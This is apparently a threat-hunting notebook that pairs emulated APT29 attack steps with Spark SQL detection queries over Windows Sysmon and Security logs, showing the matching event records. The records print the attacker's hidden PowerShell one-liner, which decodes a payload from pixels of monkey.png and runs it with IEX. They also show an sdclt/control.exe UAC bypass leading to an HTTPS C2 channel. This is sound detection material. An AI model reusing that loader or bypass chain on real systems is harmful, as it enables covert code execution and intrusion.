FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows Control Panel
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CONTROL.EXE
CommandLine: "C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=D054A1D1E0BECCA5EEF751CF616ECB811CFABECE,MD5=62D970D8B60F75C12D21C740F2D8A5DA,SHA256=D6E21DA3BE0701162A36F8C9F94E616B1A0C5FD4CC1B52EFD81959CB257957C1,IMPHASH=7A8EC2645C24D85DE8216D63022623C0
ParentProcessGuid: {47ab858c-e1e3-5eac-b503-000000000400}
ParentProcessId: 6492
ParentImage: C:\Windows\System32\sdclt.exe
ParentCommandLine: "C:\windows\system32\sdclt.exe"  

Query ID:d52fe669-55da-49e1-a76b-89297c66fa02

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
  AND EventID = 4688
  AND LOWER(ParentProcessName) LIKE "%sdclt.exe"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x131c
	New Process Name:	C:\Windows\System32\control.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0x195c
	Creator Process Name:	C:\Windows\System32\sdclt.exe
	Process Command Line:	"C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

Detection Type:Telemetry(None)

Query ID:F7E315BA-6A66-44D8-ABB3-3FBB4AA8F80A

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(Image) LIKE "%sdclt.exe"
    AND IntegrityLevel = "High"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:58:43.008
ProcessGuid: {47ab858c-e1e3-5eac-b503-000000000400}
ProcessId: 6492
Image: C:\Windows\System32\sdclt.exe
FileVersion: 10.0.18362.657 (WinBuild.160101.0800)
Description: Microsoft® Windows Backup
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: sdclt.exe
CommandLine: "C:\windows\system32\sdclt.exe" 
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=4D64682188DB0A028EC382975D8872CF1B61EBE4,MD5=F96744B10792C70426608E670C0E39DB,SHA256=DAFB903D3AA945C4AC01011E38F3E232D6BE8B7F9B66B7C3CCB1A1ECFC1B7A90,IMPHASH=B3A705D69AAAAF7164324CD5E6AF8E0D
ParentProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
ParentProcessId: 3480
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe" 

Query ID:6C8780E9-E6AF-4210-8EA0-72E9017CEE7D

df = spark.sql(
'''
SELECT Message
FROM apt29Host a
INNER JOIN (
    SELECT ProcessGuid
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 1
        AND LOWER(Image) LIKE "%control.exe"
        AND LOWER(ParentImage) LIKE "%sdclt.exe"
) b
ON a.ParentProcessGuid = b.ProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND a.EventID = 1
    AND a.IntegrityLevel = "High"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:58:44.325
ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ProcessId: 2976
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e1e3-5eac-b603-000000000400}
ParentProcessId: 4892
ParentImage: C:\Windows\System32\control.exe
ParentCommandLine: "C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter 

Query ID:C36B49B5-DF58-4A34-9FE9-56189B9DEFEA

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
  AND EventID = 4688
  AND LOWER(NewProcessName) LIKE "%sdclt.exe"
  AND MandatoryLabel = "S-1-16-12288"
  AND TokenElevationType = "%%1937"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-18
	Account Name:		SCRANTON$
	Account Domain:		DMEVALS
	Logon ID:		0x3E7

Target Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Process Information:
	New Process ID:		0x195c
	New Process Name:	C:\Windows\System32\sdclt.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xd98
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	"C:\windows\system32\sdclt.exe" 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

Query ID:EE34D18C-0549-4AFB-8B98-01160B0C9094

df = spark.sql(
'''
SELECT Message
FROM apt29Host a
INNER JOIN (
    SELECT NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
        AND LOWER(NewProcessName) LIKE "%control.exe"
        AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
) b
ON a.ProcessId = b.NewProcessId
WHERE LOWER(a.Channel) = "security"
    AND a.EventID = 4688
    AND a.MandatoryLabel = "S-1-16-12288"
    AND a.TokenElevationType = "%%1937"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xba0
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0x131c
	Creator Process Name:	C:\Windows\System32\control.exe
	Process Command Line:	"PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

3.B.3. Commonly Used Port

Procedure: Established C2 channel (192.168.0.5) via PowerShell payload over TCP port 443

Criteria: Established network channel over port 443

Detection Type:Telemetry(Correlated)

Query ID:E209D0C5-5A2B-4AEC-92B0-1510165B8EC7

df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT a.ProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
) c
ON d.ProcessGuid = c.ProcessGuid
WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 3

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Network connection detected:
RuleName: -
UtcTime: 2020-05-02 02:58:46.099
ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ProcessId: 2976
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: DMEVALS\pbeesly
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.1.4
SourceHostname: -
SourcePort: 59846
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.0.5
DestinationHostname: -
DestinationPort: 443
DestinationPortName: - 
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Network connection detected:
RuleName: -
UtcTime: 2020-05-02 02:58:45.688
ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ProcessId: 2976
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: DMEVALS\pbeesly
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.1.4
SourceHostname: -
SourcePort: 59845
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.0.5
DestinationHostname: -
DestinationPort: 443
DestinationPortName: - 

Query ID:2E9B9ADC-2426-419F-8E6E-2D9338384F80

df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT split(a.NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
) c
ON LOWER(hex(CAST(ProcessId as INT))) = c.NewProcessId
WHERE LOWER(Channel) = "security"
    AND d.EventID = 5156

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | The Windows Filtering Platform has permitted a connection.

Application Information:
	Process ID:		2976
	Application Name:	\device\harddiskvolume2\windows\system32\windowspowershell\v1.0\powershell.exe

Network Information:
	Direction:		Outbound
	Source Address:		10.0.1.4
	Source Port:		59846
	Destination Address:	192.168.0.5
	Destination Port:		443
	Protocol:		6

Filter Information:
	Filter Run-Time ID:	68659
	Layer Name:		Connect
	Layer Run-Time ID:	48 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | The Windows Filtering Platform has permitted a connection.

Application Information:
	Process ID:		2976
	Application Name:	\device\harddiskvolume2\windows\system32\windowspowershell\v1.0\powershell.exe

Network Information:
	Direction:		Outbound
	Source Address:		10.0.1.4
	Source Port:		59845
	Destination Address:	192.168.0.5
	Destination Port:		443
	Protocol:		6

Filter Information:
	Filter Run-Time ID:	68659
	Layer Name:		Connect
	Layer Run-Time ID:	48 

3.B.4. Standard Application Layer Protocol

Procedure: Used HTTPS to transport C2 (192.168.0.5) traffic

Criteria: Evidence that the network data sent over the C2 channel is HTTPS

Detection Type:None(None)

3.B.5. Standard Cryptographic Protocol

Procedure: Used HTTPS to encrypt C2 (192.168.0.5) traffic

Criteria: Evidence that the network data sent over the C2 channel is encrypted

Detection Type:None(None)

3.C.1. Modify Registry

Procedure: Modified the Registry to remove artifacts of COM hijacking

Criteria: Deletion of of the HKCU\Software\Classes\Folder\shell\Open\command subkey

Detection Type:Telemetry(Correlated)

Query ID:22A46621-7A92-48C1-81BF-B3937EB4FDC3

df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT b.ProcessGuid
    FROM apt29Host b
    INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
    ) a
    ON b.ParentProcessGuid = a.ProcessGuid
    WHERE b.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND b.EventID = 1
) c
ON d.ProcessGuid = c.ProcessGuid
WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND d.EventID = 12
  AND LOWER(d.TargetObject) RLIKE '.*\\\\\\\\folder\\\\\\\\shell\\\\\\\\open\\\\\\\\command.*'
  AND d.Message RLIKE '.*EventType: DeleteKey.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: DeleteKey
UtcTime: 2020-05-02 02:59:15.911
ProcessGuid: {47ab858c-e1f8-5eac-bc03-000000000400}
ProcessId: 3832
Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107_Classes\Folder\shell\open\command 

4.A.1. Remote File Copy

Procedure: Dropped additional tools (SysinternalsSuite.zip) to disk over C2 channel (192.168.0.5)

Criteria: powershell.exe creating the file SysinternalsSuite.zip

Detection Type:Telemetry(Correlated)

Query ID:337EA65D-55A7-4890-BB2A-6A08BB9703E2

df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT b.ProcessGuid
    FROM apt29Host b
    INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
    ) a
    ON b.ParentProcessGuid = a.ProcessGuid
    WHERE b.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND b.EventID = 1
) c
ON d.ProcessGuid = c.ProcessGuid
WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND d.EventID = 11
  AND LOWER(d.TargetFilename) LIKE '%.zip'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | File created:
RuleName: -
UtcTime: 2020-05-02 02:56:18.032
ProcessGuid: {47ab858c-e14e-5eac-ac03-000000000400}
ProcessId: 5944
Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\pbeesly\AppData\Roaming\Draft.Zip
CreationUtcTime: 2020-05-02 02:56:18.032 

4.A.2. PowerShell

Procedure: Spawned interactive powershell.exe

Criteria: powershell.exe spawning from powershell.exe

Detection Type:Telemetry(Correlated)

Query ID:B86F90BD-716C-4432-AE97-901174F111A8

df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
) c
ON d.ParentProcessGuid= c.ProcessGuid
WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 03:05:24.771
ProcessGuid: {47ab858c-e374-5eac-d803-000000000400}
ProcessId: 3852
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ParentProcessId: 2976
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 03:00:13.551
ProcessGuid: {47ab858c-e23d-5eac-c603-000000000400}
ProcessId: 3876
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ParentProcessId: 2976
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" 

Query ID:FA520225-1813-4EF2-BA58-98CB59C897D7

df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
) c
ON d.ProcessId = c.NewProcessId
WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf0c
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xba0
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	powershell.exe

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 
-RECORD 1--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf24
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xba0
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	powershell.exe

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

